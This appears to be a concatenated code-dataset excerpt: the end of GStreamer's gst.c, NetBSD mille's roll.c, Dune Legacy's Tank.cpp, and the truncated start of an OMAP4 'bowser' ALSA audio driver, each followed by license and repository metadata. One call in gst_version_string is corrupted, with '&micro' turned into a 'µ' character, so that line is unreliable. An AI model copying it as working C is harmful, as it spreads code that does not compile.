g_type_class_ref (gst_type_find_probability_get_type ());
g_type_class_ref (gst_uri_error_get_type ());
g_type_class_ref (gst_uri_type_get_type ());
g_type_class_ref (gst_parse_error_get_type ());
g_type_class_ref (gst_parse_flags_get_type ());
g_type_class_ref (gst_search_mode_get_type ());
g_type_class_ref (gst_progress_type_get_type ());
g_type_class_ref (gst_buffer_pool_acquire_flags_get_type ());
g_type_class_ref (gst_memory_flags_get_type ());
g_type_class_ref (gst_map_flags_get_type ());
g_type_class_ref (gst_caps_intersect_mode_get_type ());
g_type_class_ref (gst_pad_probe_type_get_type ());
g_type_class_ref (gst_pad_probe_return_get_type ());
g_type_class_ref (gst_segment_flags_get_type ());
g_type_class_ref (gst_scheduling_flags_get_type ());
g_type_class_ref (gst_meta_flags_get_type ());
g_type_class_ref (gst_toc_entry_type_get_type ());
g_type_class_ref (gst_toc_scope_get_type ());
g_type_class_ref (gst_toc_loop_type_get_type ());
g_type_class_ref (gst_control_binding_get_type ());
g_type_class_ref (gst_control_source_get_type ());
g_type_class_ref (gst_lock_flags_get_type ());
g_type_class_ref (gst_allocator_flags_get_type ());
g_type_class_ref (gst_stream_flags_get_type ());
_priv_gst_event_initialize ();
_priv_gst_buffer_initialize ();
_priv_gst_buffer_list_initialize ();
_priv_gst_sample_initialize ();
_priv_gst_context_initialize ();
_priv_gst_date_time_initialize ();
_priv_gst_tag_initialize ();
_priv_gst_toc_initialize ();
_priv_gst_value_initialize ();
g_type_class_ref (gst_param_spec_fraction_get_type ());
gst_parse_context_get_type ();
_priv_gst_plugin_initialize ();
/* register core plugins */
gst_plugin_register_static (GST_VERSION_MAJOR, GST_VERSION_MINOR,
"staticelements", "core elements linked into the GStreamer library",
gst_register_core_elements, VERSION, GST_LICENSE, PACKAGE,
GST_PACKAGE_NAME, GST_PACKAGE_ORIGIN);
#if defined(GSTREAMER_LITE)
gst_plugin_register_static (GST_VERSION_MAJOR, GST_VERSION_MINOR,
"gstplugins-lite", "gstplugins-lite",
lite_plugins_init, VERSION, GST_LICENSE, PACKAGE,
GST_PACKAGE_NAME, GST_PACKAGE_ORIGIN);
#endif // GSTREAMER_LITE
/*
* Any errors happening below this point are non-fatal, we therefore mark
* gstreamer as being initialized, since it is the case from a plugin point of
* view.
*
* If anything fails, it will be put back to %FALSE in gst_init_check().
* This allows some special plugins that would call gst_init() to not cause a
* looping effect (i.e. initializing GStreamer twice).
*/
gst_initialized = TRUE;
if (!gst_update_registry ())
return FALSE;
GST_INFO ("GLib runtime version: %d.%d.%d", glib_major_version,
glib_minor_version, glib_micro_version);
GST_INFO ("GLib headers version: %d.%d.%d", GLIB_MAJOR_VERSION,
GLIB_MINOR_VERSION, GLIB_MICRO_VERSION);
return TRUE;
}
#ifndef GST_DISABLE_GST_DEBUG
static gboolean
select_all (GstPlugin * plugin, gpointer user_data)
{
return TRUE;
}
static gint
sort_by_category_name (gconstpointer a, gconstpointer b)
{
return strcmp (gst_debug_category_get_name ((GstDebugCategory *) a),
gst_debug_category_get_name ((GstDebugCategory *) b));
}
static void
gst_debug_help (void)
{
GSList *list, *walk;
GList *list2, *g;
/* Need to ensure the registry is loaded to get debug categories */
if (!init_post (NULL, NULL, NULL, NULL))
exit (1);
list2 = gst_registry_plugin_filter (gst_registry_get (),
select_all, FALSE, NULL);
/* FIXME this is gross. why don't debug have categories PluginFeatures? */
for (g = list2; g; g = g_list_next (g)) {
GstPlugin *plugin = GST_PLUGIN_CAST (g->data);
gst_plugin_load (plugin);
}
g_list_free (list2);
list = gst_debug_get_all_categories ();
walk = list = g_slist_sort (list, sort_by_category_name);
g_print ("\n");
g_print ("name level description\n");
g_print ("---------------------+--------+--------------------------------\n");
while (walk) {
gboolean on_unix;
GstDebugCategory *cat = (GstDebugCategory *) walk->data;
GstDebugColorMode coloring = gst_debug_get_color_mode ();
#ifdef G_OS_UNIX
on_unix = TRUE;
#else
on_unix = FALSE;
#endif
if (GST_DEBUG_COLOR_MODE_UNIX == coloring
|| (on_unix && GST_DEBUG_COLOR_MODE_ON == coloring)) {
gchar *color = gst_debug_construct_term_color (cat->color);
g_print ("%s%-20s\033[00m %1d %s %s%s\033[00m\n",
color,
gst_debug_category_get_name (cat),
gst_debug_category_get_threshold (cat),
gst_debug_level_get_name (gst_debug_category_get_threshold (cat)),
color, gst_debug_category_get_description (cat));
g_free (color);
} else if (GST_DEBUG_COLOR_MODE_ON == coloring && !on_unix) {
#ifdef G_OS_WIN32
gint color = gst_debug_construct_win_color (cat->color);
const gint clear = FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE;
SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), color);
g_print ("%-20s", gst_debug_category_get_name (cat));
SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), clear);
g_print (" %1d %s ", gst_debug_category_get_threshold (cat),
gst_debug_level_get_name (gst_debug_category_get_threshold (cat)));
SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), color);
g_print ("%s", gst_debug_category_get_description (cat));
SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), clear);
g_print ("\n");
#endif /* G_OS_WIN32 */
} else {
g_print ("%-20s %1d %s %s\n", gst_debug_category_get_name (cat),
gst_debug_category_get_threshold (cat),
gst_debug_level_get_name (gst_debug_category_get_threshold (cat)),
gst_debug_category_get_description (cat));
}
walk = g_slist_next (walk);
}
g_slist_free (list);
g_print ("\n");
}
#endif
#ifndef GST_DISABLE_OPTION_PARSING
static gboolean
parse_one_option (gint opt, const gchar * arg, GError ** err)
{
switch (opt) {
case ARG_VERSION:
g_print ("GStreamer Core Library version %s\n", PACKAGE_VERSION);
exit (0);
case ARG_FATAL_WARNINGS:{
GLogLevelFlags fatal_mask;
fatal_mask = g_log_set_always_fatal (G_LOG_FATAL_MASK);
fatal_mask |= G_LOG_LEVEL_WARNING | G_LOG_LEVEL_CRITICAL;
g_log_set_always_fatal (fatal_mask);
break;
}
#ifndef GST_DISABLE_GST_DEBUG
case ARG_DEBUG_LEVEL:{
GstDebugLevel tmp = GST_LEVEL_NONE;
tmp = (GstDebugLevel) strtol (arg, NULL, 0);
if (((guint) tmp) < GST_LEVEL_COUNT) {
gst_debug_set_default_threshold (tmp);
}
break;
}
case ARG_DEBUG:
gst_debug_set_threshold_from_string (arg, FALSE);
break;
case ARG_DEBUG_NO_COLOR:
gst_debug_set_colored (FALSE);
break;
case ARG_DEBUG_COLOR_MODE:
gst_debug_set_color_mode_from_string (arg);
break;
case ARG_DEBUG_DISABLE:
gst_debug_set_active (FALSE);
break;
case ARG_DEBUG_HELP:
gst_debug_help ();
exit (0);
#endif
case ARG_PLUGIN_SPEW:
break;
case ARG_PLUGIN_PATH:
#ifndef GST_DISABLE_REGISTRY
split_and_iterate (arg, G_SEARCHPATH_SEPARATOR_S, add_path_func, NULL);
#endif /* GST_DISABLE_REGISTRY */
break;
case ARG_PLUGIN_LOAD:
split_and_iterate (arg, ",", prepare_for_load_plugin_func, NULL);
break;
case ARG_SEGTRAP_DISABLE:
_gst_disable_segtrap = TRUE;
break;
case ARG_REGISTRY_UPDATE_DISABLE:
#ifndef GST_DISABLE_REGISTRY
_priv_gst_disable_registry_update = TRUE;
#endif
break;
case ARG_REGISTRY_FORK_DISABLE:
gst_registry_fork_set_enabled (FALSE);
break;
default:
g_set_error (err, G_OPTION_ERROR, G_OPTION_ERROR_UNKNOWN_OPTION,
_("Unknown option"));
return FALSE;
}
return TRUE;
}
static gboolean
parse_goption_arg (const gchar * opt,
const gchar * arg, gpointer data, GError ** err)
{
static const struct
{
const gchar *opt;
int val;
} options[] = {
{
"--gst-version", ARG_VERSION}, {
"--gst-fatal-warnings", ARG_FATAL_WARNINGS},
#ifndef GST_DISABLE_GST_DEBUG
{
"--gst-debug-level", ARG_DEBUG_LEVEL}, {
"--gst-debug", ARG_DEBUG}, {
"--gst-debug-disable", ARG_DEBUG_DISABLE}, {
"--gst-debug-no-color", ARG_DEBUG_NO_COLOR}, {
"--gst-debug-color-mode", ARG_DEBUG_COLOR_MODE}, {
"--gst-debug-help", ARG_DEBUG_HELP},
#endif
{
"--gst-plugin-spew", ARG_PLUGIN_SPEW}, {
"--gst-plugin-path", ARG_PLUGIN_PATH}, {
"--gst-plugin-load", ARG_PLUGIN_LOAD}, {
"--gst-disable-segtrap", ARG_SEGTRAP_DISABLE}, {
"--gst-disable-registry-update", ARG_REGISTRY_UPDATE_DISABLE}, {
"--gst-disable-registry-fork", ARG_REGISTRY_FORK_DISABLE}, {
NULL}
};
gint val = 0, n;
for (n = 0; options[n].opt; n++) {
if (!strcmp (opt, options[n].opt)) {
val = options[n].val;
break;
}
}
return parse_one_option (val, arg, err);
}
#endif
/**
* gst_deinit:
*
* Clean up any resources created by GStreamer in gst_init().
*
* It is normally not needed to call this function in a normal application
* as the resources will automatically be freed when the program terminates.
* This function is therefore mostly used by testsuites and other memory
* profiling tools.
*
* After this call GStreamer (including this method) should not be used anymore.
*/
void
gst_deinit (void)
{
GstBinClass *bin_class;
GstClock *clock;
GST_INFO ("deinitializing GStreamer");
if (gst_deinitialized) {
GST_DEBUG ("already deinitialized");
return;
}
g_thread_pool_set_max_unused_threads (0);
bin_class = GST_BIN_CLASS (g_type_class_peek (gst_bin_get_type ()));
if (bin_class->pool != NULL) {
g_thread_pool_free (bin_class->pool, FALSE, TRUE);
bin_class->pool = NULL;
}
gst_task_cleanup_all ();
g_slist_foreach (_priv_gst_preload_plugins, (GFunc) g_free, NULL);
g_slist_free (_priv_gst_preload_plugins);
_priv_gst_preload_plugins = NULL;
#ifndef GST_DISABLE_REGISTRY
g_list_foreach (_priv_gst_plugin_paths, (GFunc) g_free, NULL);
g_list_free (_priv_gst_plugin_paths);
_priv_gst_plugin_paths = NULL;
#endif
clock = gst_system_clock_obtain ();
gst_object_unref (clock);
gst_object_unref (clock);
_priv_gst_registry_cleanup ();
#ifndef GST_DISABLE_TRACE
_priv_gst_alloc_trace_deinit ();
#endif
g_type_class_unref (g_type_class_peek (gst_object_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_get_type ()));
g_type_class_unref (g_type_class_peek (gst_element_factory_get_type ()));
g_type_class_unref (g_type_class_peek (gst_element_get_type ()));
g_type_class_unref (g_type_class_peek (gst_type_find_factory_get_type ()));
g_type_class_unref (g_type_class_peek (gst_bin_get_type ()));
g_type_class_unref (g_type_class_peek (gst_bus_get_type ()));
g_type_class_unref (g_type_class_peek (gst_task_get_type ()));
g_type_class_unref (g_type_class_peek (gst_object_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_bin_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_buffer_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_buffer_copy_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_bus_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_bus_sync_reply_get_type ()));
g_type_class_unref (g_type_class_peek (gst_caps_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_clock_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_clock_return_get_type ()));
g_type_class_unref (g_type_class_peek (gst_clock_entry_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_clock_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_debug_graph_details_get_type ()));
g_type_class_unref (g_type_class_peek (gst_state_get_type ()));
g_type_class_unref (g_type_class_peek (gst_state_change_return_get_type ()));
g_type_class_unref (g_type_class_peek (gst_state_change_get_type ()));
g_type_class_unref (g_type_class_peek (gst_element_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_core_error_get_type ()));
g_type_class_unref (g_type_class_peek (gst_library_error_get_type ()));
g_type_class_unref (g_type_class_peek (gst_plugin_dependency_flags_get_type
()));
g_type_class_unref (g_type_class_peek (gst_parse_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_resource_error_get_type ()));
g_type_class_unref (g_type_class_peek (gst_search_mode_get_type ()));
g_type_class_unref (g_type_class_peek (gst_stream_error_get_type ()));
g_type_class_unref (g_type_class_peek (gst_stream_status_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_structure_change_type_get_type
()));
g_type_class_unref (g_type_class_peek (gst_event_type_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_event_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_seek_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_seek_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_qos_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_format_get_type ()));
g_type_class_unref (g_type_class_peek (gst_debug_level_get_type ()));
g_type_class_unref (g_type_class_peek (gst_debug_color_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_iterator_result_get_type ()));
g_type_class_unref (g_type_class_peek (gst_iterator_item_get_type ()));
g_type_class_unref (g_type_class_peek (gst_message_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_meta_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_mini_object_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_link_return_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_link_check_get_type ()));
g_type_class_unref (g_type_class_peek (gst_flow_return_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_mode_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_direction_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_presence_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_template_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pipeline_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_plugin_error_get_type ()));
g_type_class_unref (g_type_class_peek (gst_plugin_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_rank_get_type ()));
g_type_class_unref (g_type_class_peek (gst_query_type_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_query_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_buffering_mode_get_type ()));
g_type_class_unref (g_type_class_peek (gst_tag_merge_mode_get_type ()));
g_type_class_unref (g_type_class_peek (gst_tag_flag_get_type ()));
g_type_class_unref (g_type_class_peek (gst_tag_scope_get_type ()));
g_type_class_unref (g_type_class_peek (gst_task_state_get_type ()));
g_type_class_unref (g_type_class_peek (gst_toc_entry_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_toc_scope_get_type ()));
g_type_class_unref (g_type_class_peek (gst_type_find_probability_get_type
()));
g_type_class_unref (g_type_class_peek (gst_uri_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_uri_error_get_type ()));
g_type_class_unref (g_type_class_peek (gst_parse_error_get_type ()));
g_type_class_unref (g_type_class_peek (gst_param_spec_fraction_get_type ()));
g_type_class_unref (g_type_class_peek (gst_progress_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_buffer_pool_acquire_flags_get_type
()));
g_type_class_unref (g_type_class_peek (gst_memory_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_map_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_caps_intersect_mode_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_probe_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_pad_probe_return_get_type ()));
g_type_class_unref (g_type_class_peek (gst_segment_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_scheduling_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_control_binding_get_type ()));
g_type_class_unref (g_type_class_peek (gst_control_source_get_type ()));
g_type_class_unref (g_type_class_peek (gst_toc_entry_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_toc_loop_type_get_type ()));
g_type_class_unref (g_type_class_peek (gst_lock_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_allocator_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_stream_flags_get_type ()));
g_type_class_unref (g_type_class_peek (gst_debug_color_mode_get_type ()));
gst_deinitialized = TRUE;
GST_INFO ("deinitialized GStreamer");
}
/**
* gst_version:
* @major: (out): pointer to a guint to store the major version number
* @minor: (out): pointer to a guint to store the minor version number
* @micro: (out): pointer to a guint to store the micro version number
* @nano: (out): pointer to a guint to store the nano version number
*
* Gets the version number of the GStreamer library.
*/
void
gst_version (guint * major, guint * minor, guint * micro, guint * nano)
{
g_return_if_fail (major);
g_return_if_fail (minor);
g_return_if_fail (micro);
g_return_if_fail (nano);
*major = GST_VERSION_MAJOR;
*minor = GST_VERSION_MINOR;
*micro = GST_VERSION_MICRO;
*nano = GST_VERSION_NANO;
}
/**
* gst_version_string:
*
* This function returns a string that is useful for describing this version
* of GStreamer to the outside world: user agent strings, logging, ...
*
* Returns: (transfer full): a newly allocated string describing this version
* of GStreamer.
*/
gchar *
gst_version_string (void)
{
guint major, minor, micro, nano;
gst_version (&major, &minor, µ, &nano);
if (nano == 0)
return g_strdup_printf ("GStreamer %d.%d.%d", major, minor, micro);
else if (nano == 1)
return g_strdup_printf ("GStreamer %d.%d.%d (GIT)", major, minor, micro);
else
return g_strdup_printf ("GStreamer %d.%d.%d (prerelease)", major, minor,
micro);
}
/**
* gst_segtrap_is_enabled:
*
* Some functions in the GStreamer core might install a custom SIGSEGV handler
* to better catch and report errors to the application. Currently this feature
* is enabled by default when loading plugins.
*
* Applications might want to disable this behaviour with the
* gst_segtrap_set_enabled() function. This is typically done if the application
* wants to install its own handler without GStreamer interfering.
*
* Returns: %TRUE if GStreamer is allowed to install a custom SIGSEGV handler.
*/
gboolean
gst_segtrap_is_enabled (void)
{
/* yeps, it's enabled when it's not disabled */
return !_gst_disable_segtrap;
}
/**
* gst_segtrap_set_enabled:
* @enabled: whether a custom SIGSEGV handler should be installed.
*
* Applications might want to disable/enable the SIGSEGV handling of
* the GStreamer core. See gst_segtrap_is_enabled() for more information.
*/
void
gst_segtrap_set_enabled (gboolean enabled)
{
_gst_disable_segtrap = !enabled;
}
| gpl-2.0 |
lyn1337/LinuxDSc2 | user/games/bsdgames/mille/roll.c | 2 | 2103 | /* $NetBSD: roll.c,v 1.7 2003/08/07 09:37:26 agc Exp $ */
/*
* Copyright (c) 1982, 1993
* The Regents of the University of California. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <sys/cdefs.h>
#ifndef lint
#if 0
static char sccsid[] = "@(#)roll.c 8.1 (Berkeley) 5/31/93";
#else
__RCSID("$NetBSD: roll.c,v 1.7 2003/08/07 09:37:26 agc Exp $");
#endif
#endif /* not lint */
# include "mille.h"
/*
* This routine rolls ndie nside-sided dice.
*
* @(#)roll.c 1.1 (Berkeley) 4/1/82
*
*/
int
roll(ndie, nsides)
int ndie, nsides;
{
int tot;
tot = 0;
while (ndie--)
tot += random() % nsides + 1;
return tot;
}
| gpl-2.0 |
binarycrusader/dunelegacy | src/units/Tank.cpp | 2 | 2991 | /*
* This file is part of Dune Legacy.
*
* Dune Legacy is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 2 of the License, or
* (at your option) any later version.
*
* Dune Legacy is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with Dune Legacy. If not, see <http://www.gnu.org/licenses/>.
*/
#include <units/Tank.h>
#include <globals.h>
#include <FileClasses/GFXManager.h>
#include <House.h>
#include <Game.h>
#include <Map.h>
#include <Explosion.h>
#include <ScreenBorder.h>
#include <SoundPlayer.h>
Tank::Tank(House* newOwner) : TankBase(newOwner) {
Tank::init();
setHealth(getMaxHealth());
}
Tank::Tank(InputStream& stream) : TankBase(stream) {
Tank::init();
}
void Tank::init() {
itemID = Unit_Tank;
owner->incrementUnits(itemID);
numWeapons = 1;
bulletType = Bullet_ShellMedium;
graphicID = ObjPic_Tank_Base;
graphic = pGFXManager->getObjPic(graphicID,getOwner()->getHouseID());
gunGraphicID = ObjPic_Tank_Gun;
turretGraphic = pGFXManager->getObjPic(gunGraphicID,getOwner()->getHouseID());
numImagesX = NUM_ANGLES;
numImagesY = 1;
}
Tank::~Tank() {
}
void Tank::blitToScreen() {
SDL_Surface* pUnitGraphic = graphic[currentZoomlevel];
int imageW1 = pUnitGraphic->w/numImagesX;
int x = screenborder->world2screenX(realX);
int y = screenborder->world2screenY(realY);
SDL_Rect source1 = { drawnAngle * imageW1, 0, imageW1, pUnitGraphic->h };
SDL_Rect dest1 = { x - imageW1/2, y - pUnitGraphic->h/2, imageW1, pUnitGraphic->h };
SDL_BlitSurface(pUnitGraphic, &source1, screen, &dest1);
SDL_Surface* pTurretGraphic = turretGraphic[currentZoomlevel];
int imageW2 = pTurretGraphic->w/NUM_ANGLES;
SDL_Rect source2 = { drawnTurretAngle * imageW2, 0, imageW2, pTurretGraphic->h };
SDL_Rect dest2 = { x - imageW2/2, y - pTurretGraphic->h/2, imageW2, pTurretGraphic->h };
SDL_BlitSurface(pTurretGraphic, &source2, screen, &dest2);
if(isBadlyDamaged()) {
drawSmoke(x, y);
}
}
void Tank::destroy() {
if(currentGameMap->tileExists(location) && isVisible()) {
Coord realPos(lround(realX), lround(realY));
Uint32 explosionID = currentGame->randomGen.getRandOf(3,Explosion_Medium1, Explosion_Medium2,Explosion_Flames);
currentGame->getExplosionList().push_back(new Explosion(explosionID, realPos, owner->getHouseID()));
if(isVisible(getOwner()->getTeam()))
soundPlayer->playSoundAt(Sound_ExplosionMedium,location);
}
TankBase::destroy();
}
void Tank::playAttackSound() {
soundPlayer->playSoundAt(Sound_ExplosionSmall,location);
}
| gpl-2.0 |
ChameleonOS/android_kernel_amazon_bowser-common | sound/soc/omap/bowser.c | 2 | 16415 | /*
* bowser.c -- SoC audio for TI OMAP4430 SDP
*
* Author: Misael Lopez Cruz <x0052729@ti.com>
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* version 2 as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
* 02110-1301 USA
*
*/
#include <linux/clk.h>
#include <linux/platform_device.h>
#include <linux/i2c.h>
#include <linux/i2c/twl.h>
#include <linux/regulator/consumer.h>
#include <linux/delay.h>
#include <sound/core.h>
#include <sound/pcm.h>
#include <sound/pcm_params.h>
#include <sound/soc.h>
#include <sound/soc-dapm.h>
#include <sound/jack.h>
#include <sound/soc-dsp.h>
#include <asm/mach-types.h>
#include <plat/hardware.h>
#include <plat/mux.h>
#include <plat/mcbsp.h>
#include "omap-mcpdm.h"
#include "omap-abe.h"
#include "omap-pcm.h"
#include "omap-mcbsp.h"
#include "omap-dmic.h"
#include "../codecs/wm8962.h"
#ifdef CONFIG_SND_OMAP_SOC_HDMI
#include "omap-hdmi.h"
#endif
#include "abe/abe_main.h"
#define ALSA_DEBUG
#include "bowser_alsa_debug.h"
#define WM8962_MCLK_RATE 19200000
#ifdef CONFIG_ABE_44100
#define WM8962_SYS_CLK_RATE (44100 * 512)
#else
#define WM8962_SYS_CLK_RATE (48000 * 512)
#endif
/* static struct regulator *av_switch_reg; */
static struct clk *wm8962_mclk;
static unsigned int fll_clk = WM8962_SYS_CLK_RATE;
static unsigned int sys_clk = WM8962_SYS_CLK_RATE;
static struct snd_soc_dai *codec_dai;
static enum snd_soc_bias_level bias_level = SND_SOC_BIAS_OFF;
static struct snd_soc_jack bowser_jack;
static int bowser_set_bias_level(struct snd_soc_card *card,
struct snd_soc_dapm_context *dapm,
enum snd_soc_bias_level level)
{
int ret;
if (codec_dai->dev == NULL){
pr_err("no run time codec_dai initialized yet\n");
return -EINVAL;
}
dev_dbg(codec_dai->dev, "Setting bias %d\n", level);
if (dapm->dev != codec_dai->dev) {
dev_dbg(dapm->dev,"dapm->dev!=codec_dai->dev\n");
return 0;
}
switch (level) {
case SND_SOC_BIAS_STANDBY:
if (bias_level == SND_SOC_BIAS_OFF) {
ret = clk_enable(wm8962_mclk);
if (ret < 0) {
dev_err(codec_dai->dev,
"Failed to enable MCLK: %d\n", ret);
return ret;
}
}
break;
case SND_SOC_BIAS_PREPARE:
if (bias_level == SND_SOC_BIAS_STANDBY) {
ret = snd_soc_dai_set_pll(codec_dai, WM8962_FLL,
WM8962_FLL_MCLK,
WM8962_MCLK_RATE,
fll_clk);
if (ret < 0) {
dev_err(codec_dai->dev,
"Failed to start CODEC FLL: %d\n",
ret);
return ret;
}
ret = snd_soc_dai_set_sysclk(codec_dai,
WM8962_SYSCLK_FLL,
sys_clk, 0);
if (ret < 0) {
dev_err(codec_dai->dev,
"Failed to set CODEC SYSCLK: %d\n",
ret);
return ret;
}
}
break;
default:
break;
}
return 0;
}
static int bowser_set_bias_level_post(struct snd_soc_card *card,
struct snd_soc_dapm_context *dapm,
enum snd_soc_bias_level level)
{
int ret;
if (codec_dai->dev == NULL){
pr_err("no run time codec_dai initialized yet\n");
return -EINVAL;
}
dev_dbg(codec_dai->dev, "Setting bias post %d\n", level);
if (dapm->dev != codec_dai->dev) {
dev_dbg(dapm->dev,"dapm->dev!=codec_dai->dev\n");
return 0;
}
switch (level) {
case SND_SOC_BIAS_STANDBY:
if (bias_level == SND_SOC_BIAS_PREPARE) {
ret = snd_soc_dai_set_sysclk(codec_dai,
WM8962_SYSCLK_MCLK,
sys_clk, 0);
if (ret < 0) {
dev_err(codec_dai->dev,
"Failed to set CODEC SYSCLK: %d\n",
ret);
return ret;
}
ret = snd_soc_dai_set_pll(codec_dai, WM8962_FLL,
WM8962_FLL_MCLK, 0, 0);
if (ret < 0) {
dev_err(codec_dai->dev,
"Failed to stop CODEC FLL: %d\n", ret);
return ret;
}
}
break;
case SND_SOC_BIAS_OFF:
clk_disable(wm8962_mclk);
break;
default:
break;
}
bias_level = level;
return 0;
}
static int bowser_suspend_pre(struct snd_soc_card *card)
{
dev_crit(codec_dai->dev,"%s\n",__func__);
if (codec_dai->dev == NULL){
dev_err(codec_dai->dev,"no run time codec_dai initialized yet\n");
return -EINVAL;
}
snd_soc_dapm_disable_pin(&codec_dai->codec->dapm, "SYSCLK");
snd_soc_dapm_sync(&codec_dai->codec->dapm);
msleep(10);
snd_soc_dapm_disable_pin(&codec_dai->codec->dapm, "MICBIAS");
snd_soc_dapm_sync(&codec_dai->codec->dapm);
return 0;
}
static int bowser_resume_post(struct snd_soc_card *card)
{
int ret=0;
dev_dbg(codec_dai->dev,"%s is calling mic_detect\n", __func__);
ret = wm8962_mic_detect(codec_dai->codec, &bowser_jack);
return ret;
}
static int bowser_wm8962_hw_params(struct snd_pcm_substream *substream,
struct snd_pcm_hw_params *params)
{
struct snd_soc_pcm_runtime *rtd = substream->private_data;
struct snd_soc_dai *cpu_dai = rtd->cpu_dai;
struct snd_soc_dai *codec_dai = rtd->codec_dai;
int ret;
dev_dbg(codec_dai->dev, "%s() - enter\n", __func__);
#ifdef CONFIG_MACH_OMAP4_BOWSER_SUBTYPE_JEM_FTM
sys_clk = fll_clk = params_rate(params) * 512;
if (fll_clk < 6000000)
fll_clk *= 2;
ret = snd_soc_dai_set_sysclk(codec_dai, WM8962_SYSCLK_MCLK,
WM8962_MCLK_RATE, SND_SOC_CLOCK_IN);
if (ret < 0) {
dev_err(codec_dai->dev, "Failed to set CODEC SYSCLK: %d\n",
ret);
return ret;
}
#else
sys_clk = fll_clk = WM8962_SYS_CLK_RATE;
#endif
ret = snd_soc_dai_set_pll(codec_dai, WM8962_FLL, WM8962_FLL_MCLK,
WM8962_MCLK_RATE, fll_clk);
if (ret < 0) {
dev_err(codec_dai->dev, "Failed to start CODEC FLL: %d\n",
ret);
return ret;
}
ret = snd_soc_dai_set_sysclk(codec_dai, WM8962_SYSCLK_FLL,
sys_clk, 0);
if (ret < 0) {
dev_err(codec_dai->dev, "Failed to set CODEC SYSCLK: %d\n",
ret);
return ret;
}
ret = snd_soc_dai_set_fmt(codec_dai, SND_SOC_DAIFMT_DSP_B |
SND_SOC_DAIFMT_CBM_CFM |
